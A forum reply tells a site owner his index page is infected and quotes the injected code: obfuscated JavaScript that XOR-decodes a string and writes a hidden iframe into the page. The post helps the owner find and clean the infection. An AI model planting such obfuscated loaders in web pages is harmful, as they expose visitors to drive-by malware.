Quote:
|
Originally Posted by AlienQ
I have had a couple people mention that to me.
I checked the code, I do not engage in any malicious ware nor do I run any bullshit with my content.
Nor do I run any bullshit on my site.
From what I know all it is simply is a basic page with an IFRAME to my video demo. the video clip is straight up from Windows Media Encoder and uploaded.
If ya cat's could point out somthing more specific I will check into it.
|
thats your trojan:
Code:
<script language="JavaScript">
e = '0x00' + '22';str1 = "%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA%C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA%C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE%8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6%CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%99%8C%C1%CA%D7%9F%BD%AE%AB";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</script>
check that code it's on your index page.
check too every head.php , footer.php, index.html and index.php on your site... probably you found the same code. I had the same problem 2 or 3 weeks ago